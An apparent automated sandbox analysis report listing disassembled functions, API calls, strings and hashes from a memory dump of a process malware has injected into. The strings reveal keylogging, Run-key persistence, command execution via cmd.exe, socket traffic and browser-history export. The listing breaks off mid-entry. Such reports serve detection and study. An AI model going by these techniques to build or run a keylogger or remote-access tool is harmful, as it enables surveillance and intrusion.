                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                          • String ID:
                                                          • API String ID: 336800556-0
                                                          • Opcode ID: 1c337325f04e7d1350835243513ef37ea9cf72bd865eed212f137dea6565717b
                                                          • Instruction ID: 38685928f53d0fdec7f9771a1fbcf5508afe04d06d5fe5a1692e2fd93afee85f
                                                          • Opcode Fuzzy Hash: 1c337325f04e7d1350835243513ef37ea9cf72bd865eed212f137dea6565717b
                                                          • Instruction Fuzzy Hash: 8201B1726417117F73215ABB6C8CC7B6A6DEEC2BA2315013ABD04D6201DA788C0291B9
                                                          Function 00446F43 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          • GetLastError.KERNEL32(?,00000000,00000000,0043A7C2,00000000,?,?,0043A846,00000000,00000000,00000000,00000000,00000000,00000000,00402C08,?), ref: 00446F48
                                                          • _free.LIBCMT ref: 00446F7D
                                                          • _free.LIBCMT ref: 00446FA4
                                                          • SetLastError.KERNEL32(00000000), ref: 00446FB1
                                                          • SetLastError.KERNEL32(00000000), ref: 00446FBA
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ErrorLast$_free
                                                          • String ID:
                                                          • API String ID: 3170660625-0
                                                          • Opcode ID: f4408b0af08e6f25a576fef194bdae15b87294ed1dfbee705da3a0fd61bfb56a
                                                          • Instruction ID: 6bd692df8320938abc1815071491dbd9703328d73d2f54107518a18b095bb187
                                                          • Opcode Fuzzy Hash: f4408b0af08e6f25a576fef194bdae15b87294ed1dfbee705da3a0fd61bfb56a
                                                          • Instruction Fuzzy Hash: 7401D13620C70067F61266757C85D2F266DDBC3B66727013FF958A2292EE2CCC0A452F
                                                          Function 0044F79D Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          • _free.LIBCMT ref: 0044F7B5
                                                            • Part of subcall function 00446AC5: HeapFree.KERNEL32(00000000,00000000,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?), ref: 00446ADB
                                                            • Part of subcall function 00446AC5: GetLastError.KERNEL32(?,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?,?), ref: 00446AED
                                                          • _free.LIBCMT ref: 0044F7C7
                                                          • _free.LIBCMT ref: 0044F7D9
                                                          • _free.LIBCMT ref: 0044F7EB
                                                          • _free.LIBCMT ref: 0044F7FD
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _free$ErrorFreeHeapLast
                                                          • String ID:
                                                          • API String ID: 776569668-0
                                                          • Opcode ID: 24d082c4c32556380d94a426a0797d769337f58152c77e2724906da83e703e03
                                                          • Instruction ID: 78b16e2cd2bc6e4547488c8f4e3d182d22cf8911186b8f77a4a783cd10448158
                                                          • Opcode Fuzzy Hash: 24d082c4c32556380d94a426a0797d769337f58152c77e2724906da83e703e03
                                                          • Instruction Fuzzy Hash: 9AF01232505600BBE620EB59E8C5C1773E9EB827147A9482BF408F7641CB3DFCC48A6C
                                                          Function 004432E7 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • _free.LIBCMT ref: 00443305
                                                            • Part of subcall function 00446AC5: HeapFree.KERNEL32(00000000,00000000,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?), ref: 00446ADB
                                                            • Part of subcall function 00446AC5: GetLastError.KERNEL32(?,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?,?), ref: 00446AED
                                                          • _free.LIBCMT ref: 00443317
                                                          • _free.LIBCMT ref: 0044332A
                                                          • _free.LIBCMT ref: 0044333B
                                                          • _free.LIBCMT ref: 0044334C
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _free$ErrorFreeHeapLast
                                                          • String ID:
                                                          • API String ID: 776569668-0
                                                          • Opcode ID: ab870860b33c9a3cd44b9e2e3565930e421ff68453c6808a8f097650461ead98
                                                          • Instruction ID: 76e6a482bc9a1727a28655d1f271e5fc3ecde01143ea680422932a64b095765e
                                                          • Opcode Fuzzy Hash: ab870860b33c9a3cd44b9e2e3565930e421ff68453c6808a8f097650461ead98
                                                          • Instruction Fuzzy Hash: B9F05EF08075209FAB12AF2DBD014893BA0B786755306413BF41EB2772EB380D95DB8E
                                                          Function 00416751 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 182threadwindowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetWindowThreadProcessId.USER32(?,?), ref: 00416768
                                                          • GetWindowTextW.USER32(?,?,0000012C), ref: 0041679A
                                                          • IsWindowVisible.USER32(?), ref: 004167A1
                                                            • Part of subcall function 0041B37D: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041B395
                                                            • Part of subcall function 0041B37D: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041B3A8
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ProcessWindow$Open$TextThreadVisible
                                                          • String ID: (FG
                                                          • API String ID: 3142014140-2273637114
                                                          • Opcode ID: c7140c968b57e192add68dc6676992042de4a480ef872d90ee77a690e46fad53
                                                          • Instruction ID: 6337817d5adb2ff800b6fe7f9081d1b6a06097940366009b721c4d78a1625a25
                                                          • Opcode Fuzzy Hash: c7140c968b57e192add68dc6676992042de4a480ef872d90ee77a690e46fad53
                                                          • Instruction Fuzzy Hash: FD71E6321082414AC325FB61D8A5ADFB3E4AFE4319F50453EF58A530E1EF746A49C79A
                                                          Function 0044D459 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 168COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • _strpbrk.LIBCMT ref: 0044D4A8
                                                          • _free.LIBCMT ref: 0044D5C5
                                                            • Part of subcall function 0043A854: IsProcessorFeaturePresent.KERNEL32(00000017,0043A826,?,?,00401962,?,?,00000000,?,?,0043A846,00000000,00000000,00000000,00000000,00000000), ref: 0043A856
                                                            • Part of subcall function 0043A854: GetCurrentProcess.KERNEL32(C0000417), ref: 0043A878
                                                            • Part of subcall function 0043A854: TerminateProcess.KERNEL32(00000000), ref: 0043A87F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
                                                          • String ID: *?$.
                                                          • API String ID: 2812119850-3972193922
                                                          • Opcode ID: 5e5281a7710df1af016e28c269081ecff319cf0b763ae5275be817dad69de84b
                                                          • Instruction ID: 2d4433a3afc190a5690657b280c6536bac4d5ba0d1806d6c31be7b1549e3be36
                                                          • Opcode Fuzzy Hash: 5e5281a7710df1af016e28c269081ecff319cf0b763ae5275be817dad69de84b
                                                          • Instruction Fuzzy Hash: 7251B371E00109AFEF14DFA9C881AAEB7F5EF58318F24416FE854E7301DA799E018B54
                                                          Function 004095D6 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 158COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetKeyboardLayoutNameA.USER32(?), ref: 00409601
                                                            • Part of subcall function 004041F1: socket.WS2_32(?,00000001,00000006), ref: 00404212
                                                            • Part of subcall function 0040428C: connect.WS2_32(?,?,?), ref: 004042A5
                                                            • Part of subcall function 0041B6AA: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,?,00000000,00409689,00473EE8,?,00473EE8,00000000,00473EE8,00000000), ref: 0041B6BF
                                                            • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CreateFileKeyboardLayoutNameconnectsendsocket
                                                          • String ID: XCG$`AG$>G
                                                          • API String ID: 2334542088-2372832151
                                                          • Opcode ID: 57430c91427567827473bab5627dcff1f7b98a8ead265141081511e002c0e5a5
                                                          • Instruction ID: 7adbea44916697806613a62f0197ef330eb15d5bc584e2d7fa9685cab7613629
                                                          • Opcode Fuzzy Hash: 57430c91427567827473bab5627dcff1f7b98a8ead265141081511e002c0e5a5
                                                          • Instruction Fuzzy Hash: 865143321042405BC325F775D8A2AEF73D5AFE4308F50483FF84A671E2EE785949C69A
                                                          Function 004426D4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetModuleFileNameA.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe,00000104), ref: 00442714
                                                          • _free.LIBCMT ref: 004427DF
                                                          • _free.LIBCMT ref: 004427E9
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _free$FileModuleName
                                                          • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                          • API String ID: 2506810119-572611079
                                                          • Opcode ID: 037ffcd8ae4620a35ea0d85ea656a28a2901847f16e257e4da60b9a7372ecd68
                                                          • Instruction ID: 3cff5717343a4e3a710d875500e96c622d597d45f5ef159119de948e6b6562f0
                                                          • Opcode Fuzzy Hash: 037ffcd8ae4620a35ea0d85ea656a28a2901847f16e257e4da60b9a7372ecd68
                                                          • Instruction Fuzzy Hash: 3E31B371A00218AFEB21DF9ADD81D9EBBFCEB85314F54406BF804A7311D6B88E41DB59
                                                          Function 00403A10 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 92sleepCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00403A2A
                                                            • Part of subcall function 0041AB38: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,00403A40), ref: 0041AB5F
                                                            • Part of subcall function 004176B6: CloseHandle.KERNEL32(00403AB9,?,?,00403AB9,00465324), ref: 004176CC
                                                            • Part of subcall function 004176B6: CloseHandle.KERNEL32($SF,?,?,00403AB9,00465324), ref: 004176D5
                                                            • Part of subcall function 0041B61A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,00403AF3,00465324), ref: 0041B633
                                                          • Sleep.KERNEL32(000000FA,00465324), ref: 00403AFC
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
                                                          • String ID: /sort "Visit Time" /stext "$8>G
                                                          • API String ID: 368326130-2663660666
                                                          • Opcode ID: 1a768b4e587f7e37ad4e89c2dbfac3ccd6e7f3946661fbe69184ab2adc4031be
                                                          • Instruction ID: 7eda923cdb9144c2d3fbd791e6ccfb72172be11f11f2a08a3aebfaec1b2861d2
                                                          • Opcode Fuzzy Hash: 1a768b4e587f7e37ad4e89c2dbfac3ccd6e7f3946661fbe69184ab2adc4031be
                                                          • Instruction Fuzzy Hash: E5317331A0021456CB14FBB6DC969EE7775AF90318F40017FF906B71D2EF385A8ACA99
                                                          Function 004098A5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70threadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CreateThread.KERNEL32(00000000,00000000,004099A9,004740F8,00000000,00000000), ref: 0040992A
                                                          • CreateThread.KERNEL32(00000000,00000000,00409993,004740F8,00000000,00000000), ref: 0040993A
                                                          • CreateThread.KERNEL32(00000000,00000000,004099B5,004740F8,00000000,00000000), ref: 00409946
                                                            • Part of subcall function 0040A876: GetLocalTime.KERNEL32(?,Offline Keylogger Started,004740F8), ref: 0040A884
                                                            • Part of subcall function 0040A876: wsprintfW.USER32 ref: 0040A905
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CreateThread$LocalTimewsprintf
                                                          • String ID: Offline Keylogger Started
                                                          • API String ID: 465354869-4114347211
                                                          • Opcode ID: 0185d7c11a47f4d1cc67a4ecd2b8329abf3b52d4ddc89e50534bed34fd3ab50c
                                                          • Instruction ID: 73cd13916ef890eca76c0e29a3751801184202c96e3ca0ae9416a03768ca9078
                                                          • Opcode Fuzzy Hash: 0185d7c11a47f4d1cc67a4ecd2b8329abf3b52d4ddc89e50534bed34fd3ab50c
                                                          • Instruction Fuzzy Hash: CF11ABB15003097AD220BA36DC87CBF765CDA813A8B40053EF845225D3EA785E54C6FB
                                                          Function 0040A611 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64threadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 0040A876: GetLocalTime.KERNEL32(?,Offline Keylogger Started,004740F8), ref: 0040A884
                                                            • Part of subcall function 0040A876: wsprintfW.USER32 ref: 0040A905
                                                            • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                          • CreateThread.KERNEL32(00000000,00000000,00409993,?,00000000,00000000), ref: 0040A691
                                                          • CreateThread.KERNEL32(00000000,00000000,004099B5,?,00000000,00000000), ref: 0040A69D
                                                          • CreateThread.KERNEL32(00000000,00000000,004099C1,?,00000000,00000000), ref: 0040A6A9
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CreateThread$LocalTime$wsprintf
                                                          • String ID: Online Keylogger Started
                                                          • API String ID: 112202259-1258561607
                                                          • Opcode ID: 0ab913a718ddbccfb03f45b8536d2eca94befdef1450a1bc42c59ede1cf71113
                                                          • Instruction ID: 3917ec9fcb61ff418b23047d8298326e5ff7fd14d64f683336ff9c65b5464130
                                                          • Opcode Fuzzy Hash: 0ab913a718ddbccfb03f45b8536d2eca94befdef1450a1bc42c59ede1cf71113
                                                          • Instruction Fuzzy Hash: DE01C4916003093AE62076368C87DBF3A6DCA813A8F40043EF541362C3E97D5D5582FB
                                                          Function 0044AA73 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          • CloseHandle.KERNEL32(00000000,00000000,`@,?,0044A991,`@,0046DD28,0000000C), ref: 0044AAC9
                                                          • GetLastError.KERNEL32(?,0044A991,`@,0046DD28,0000000C), ref: 0044AAD3
                                                          • __dosmaperr.LIBCMT ref: 0044AAFE
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CloseErrorHandleLast__dosmaperr
                                                          • String ID: `@
                                                          • API String ID: 2583163307-951712118
                                                          • Opcode ID: e5cf9cf0863519c22c59f520a66439faf8bffb0939932f5db486048d3d382d3d
                                                          • Instruction ID: 1bd3c876d7044edfb1a6812000b34c32b622226010ed5631802de8abdb52b33d
                                                          • Opcode Fuzzy Hash: e5cf9cf0863519c22c59f520a66439faf8bffb0939932f5db486048d3d382d3d
                                                          • Instruction Fuzzy Hash: F8018E366446201AF7206674698577F77898B82738F2A027FF904972D2DE6DCCC5C19F
                                                          Function 00404915 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 60timethreadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetLocalTime.KERNEL32(?), ref: 00404946
                                                          • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00404994
                                                          • CreateThread.KERNEL32(00000000,00000000,00404B1D,?,00000000,00000000), ref: 004049A7
                                                          Strings
                                                          • KeepAlive | Enabled | Timeout: , xrefs: 0040495C
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Create$EventLocalThreadTime
                                                          • String ID: KeepAlive | Enabled | Timeout:
                                                          • API String ID: 2532271599-1507639952
                                                          • Opcode ID: 039a83a3673151248ce1c058b5ed99207d7e0ff837a33c13ebd59ef1524b6346
                                                          • Instruction ID: c7daaf492e0cec12b0841424890a61be8e5b61f5a3177df3d8f4b9063cedc03f
                                                          • Opcode Fuzzy Hash: 039a83a3673151248ce1c058b5ed99207d7e0ff837a33c13ebd59ef1524b6346
                                                          • Instruction Fuzzy Hash: 38113AB19042547AC710A7BA8C49BCB7F9C9F86364F00407BF40462192C7789845CBFA
                                                          Function 00404B29 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47synchronizationCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00404B26), ref: 00404B40
                                                          • CloseHandle.KERNEL32(?,?,?,?,00404B26), ref: 00404B98
                                                          • SetEvent.KERNEL32(?,?,?,?,00404B26), ref: 00404BA7
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CloseEventHandleObjectSingleWait
                                                          • String ID: Connection Timeout
                                                          • API String ID: 2055531096-499159329
                                                          • Opcode ID: a97e81c914b9350505812461b63a63b2fd2cd8a093a8b12f04dedae0d79932b3
                                                          • Instruction ID: ea4abd021a31a941d528121f8d879e106695b0b6a7a7fd2d86c7f06b9a048df4
                                                          • Opcode Fuzzy Hash: a97e81c914b9350505812461b63a63b2fd2cd8a093a8b12f04dedae0d79932b3
                                                          • Instruction Fuzzy Hash: 7A01F5B1940B41AFD325BB3A9C4645ABBE4AB45315700053FF6D392BB1DA38E8408B5A
                                                          Function 00412774 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 38registryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • RegCreateKeyW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,?), ref: 0041277F
                                                          • RegSetValueExW.ADVAPI32(?,00000000,00000000,00000001,00000000,00000000,?,?,?,?,00000000,004742E0,762337E0,?), ref: 004127AD
                                                          • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,004742E0,762337E0,?,?,?,?,?,0040BE18,?,00000000), ref: 004127B8
                                                          Strings
                                                          • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 0041277D
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CloseCreateValue
                                                          • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                                                          • API String ID: 1818849710-1051519024
                                                          • Opcode ID: f3f4d92ea395f83514c7fc898d5ccc6e166341d4c45edfed3dd661c905dadffd
                                                          • Instruction ID: fff2d7bcc465bc574364a4979b4b77ba115ffea085319746951fe37a0eeb78e5
                                                          • Opcode Fuzzy Hash: f3f4d92ea395f83514c7fc898d5ccc6e166341d4c45edfed3dd661c905dadffd
                                                          • Instruction Fuzzy Hash: 9FF0CD31500218BBDF109FA0ED46EEF37ACAB40B50F104539F902A60A1E675DB14DAA4
                                                          Function 0040CDBE Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 38COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 0040CDC9
                                                          • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040CE08
                                                            • Part of subcall function 004347BD: _Yarn.LIBCPMT ref: 004347DC
                                                            • Part of subcall function 004347BD: _Yarn.LIBCPMT ref: 00434800
                                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 0040CE2C
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
                                                          • String ID: bad locale name
                                                          • API String ID: 3628047217-1405518554
                                                          • Opcode ID: 07a2f8cd9595a8075203c453c032e2fb497ed10d9d6fcf4fa69d5ee2e3489bdb
                                                          • Instruction ID: 69d9b4558c1556c2c918d31b5ea24064f6fee533cc814fb99c42b36f0b05f267
                                                          • Opcode Fuzzy Hash: 07a2f8cd9595a8075203c453c032e2fb497ed10d9d6fcf4fa69d5ee2e3489bdb
                                                          • Instruction Fuzzy Hash: 1AF08171400204EAC724FB23D853ACA73A49F54748F90497FB506214D2EF38A618CA8C
                                                          Function 004126D2 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 37registryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • RegCreateKeyA.ADVAPI32(80000001,Control Panel\Desktop,004655B0), ref: 004126E1
                                                          • RegSetValueExA.ADVAPI32(004655B0,?,00000000,?,00000000,00000000,Control Panel\Desktop,?,?,0041BC46,WallpaperStyle,004655B0,00000001,00473EE8,00000000), ref: 00412709
                                                          • RegCloseKey.ADVAPI32(004655B0,?,?,0041BC46,WallpaperStyle,004655B0,00000001,00473EE8,00000000,?,004079DD,00000001), ref: 00412714
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CloseCreateValue
                                                          • String ID: Control Panel\Desktop
                                                          • API String ID: 1818849710-27424756
                                                          • Opcode ID: 3aedce82be745f7a8d31741b6ddf3b86529f340df0cdc46c1cf573c60441b443
                                                          • Instruction ID: d7c223529d0a909ac1d5b5cf1be9cbd74eb10d05c00374dbcf2eb8abb0eb8976
                                                          • Opcode Fuzzy Hash: 3aedce82be745f7a8d31741b6ddf3b86529f340df0cdc46c1cf573c60441b443
                                                          • Instruction Fuzzy Hash: 98F09032040104FBCB019FA0ED55EEF37ACEF04751F108139FD06A61A1EA75DE04EA94
                                                          Function 004127D5 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 31registryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
                                                          • RegSetValueExA.ADVAPI32(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
                                                          • RegCloseKey.ADVAPI32(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CloseCreateValue
                                                          • String ID: TUF
                                                          • API String ID: 1818849710-3431404234
                                                          • Opcode ID: 386e33d00f3fb5cef405d4ff1ae12e7e359dce24562d3d83ccac8fce873b9f24
                                                          • Instruction ID: 4d8f19d4f5fba69279ea975c705bdc3302fb28fe13ea63ccb444db4f968143a5
                                                          • Opcode Fuzzy Hash: 386e33d00f3fb5cef405d4ff1ae12e7e359dce24562d3d83ccac8fce873b9f24
                                                          • Instruction Fuzzy Hash: 8DE03071540204BFEF115B909C05FDB3BA8EB05B95F004161FA05F6191D271CE14D7A4
                                                          Function 004151B2 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 27COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 004151F4
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ExecuteShell
                                                          • String ID: /C $cmd.exe$open
                                                          • API String ID: 587946157-3896048727
                                                          • Opcode ID: b29912c7ec69b7e063321f84cff0ad8ed8559f61d9423d2534ea1fccbc267807
                                                          • Instruction ID: 3ae8c2b06d9b1922b9065f49b1512f2a4b1b87a12dccb2265ed1bd098505db2c
                                                          • Opcode Fuzzy Hash: b29912c7ec69b7e063321f84cff0ad8ed8559f61d9423d2534ea1fccbc267807
                                                          • Instruction Fuzzy Hash: D8E030701043006AC708FB61DC95C7F77AC9A80708F10083EB542A21E2EF3CA949C65E
                                                          Function 004014D5 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 7libraryloaderCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • LoadLibraryA.KERNEL32(User32.dll,GetLastInputInfo), ref: 004014DF
                                                          • GetProcAddress.KERNEL32(00000000), ref: 004014E6
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AddressLibraryLoadProc
                                                          • String ID: GetLastInputInfo$User32.dll
                                                          • API String ID: 2574300362-1519888992
                                                          • Opcode ID: 3fc7b1db73b7af1b2a271cc819159fe1e403f0356e3f7920f37c5b1d7d3a7c56
                                                          • Instruction ID: 425bdc246283df71b7ad83aa0519e38d385401eab2b134f4ae8d574857069069
                                                          • Opcode Fuzzy Hash: 3fc7b1db73b7af1b2a271cc819159fe1e403f0356e3f7920f37c5b1d7d3a7c56
                                                          • Instruction Fuzzy Hash: D7B092B85843849BC7202BE0BC0DA297BA4FA48B43720447AF406D11A1EB7881809F6F
                                                          Function 00448D0B Relevance: 6.3, APIs: 4, Instructions: 305COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
